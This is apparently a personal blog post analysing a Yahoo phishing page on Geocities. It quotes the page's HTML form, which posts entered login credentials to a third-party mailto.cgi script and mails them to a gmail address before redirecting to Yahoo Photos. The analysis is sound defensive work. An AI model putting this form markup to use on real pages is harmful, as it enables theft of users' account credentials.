Recently, I have been getting a lot of messages from people in my Yahoo list, which reads something like this :

http://www.geocities.com/bisxybiotch/

Strange, I thought. The geocities homepage shows up similar to the Yahoo Photos page, prompting me for a loginid/passwd. I thought something was not right. On downloading the page, and reading through the HTML source, I could see something like this :

< FORM METHOD="POST" ACTION="http://www2 

.fiberbit.ne

t/form/mailto.

cgi" ENCTYPE="x-www-form-urlencoded"> <INPUT TYPE="hidden" NAME="Mail_From" VALUE="Yahoo"> 

<INPUT TYPE="hidden" NAME="Mail_To" VALUE="bisxybiotch@gmail.com"> <INPUT TYPE="hidden" NAME="Mail_Subject" VALUE="Yahoo id">

<INPUT TYPE="hidden" NAME="Next_Page" VALUE="http://photo

s.yahoo.com/ph

//my_photos">

On converting the integer values to ASCII characters it looked something like this :

FORM METHOD="POST" ACTION="http://www2.fiberbit.net/form/mailto.cgi"
ENCTYPE="x-www-form-urlencoded">    

I started ethereal to check out what data is being transmitted. I used a fake userid and password, and I could see that the credentials were being transmitted to the mailto.cgi form on that website. I think, it mails out the credentials to that gmail id, and once it has a valid password, it would get a list of my contacts and send that malicious message to all of them as well...

An example of "Semantic Attacks".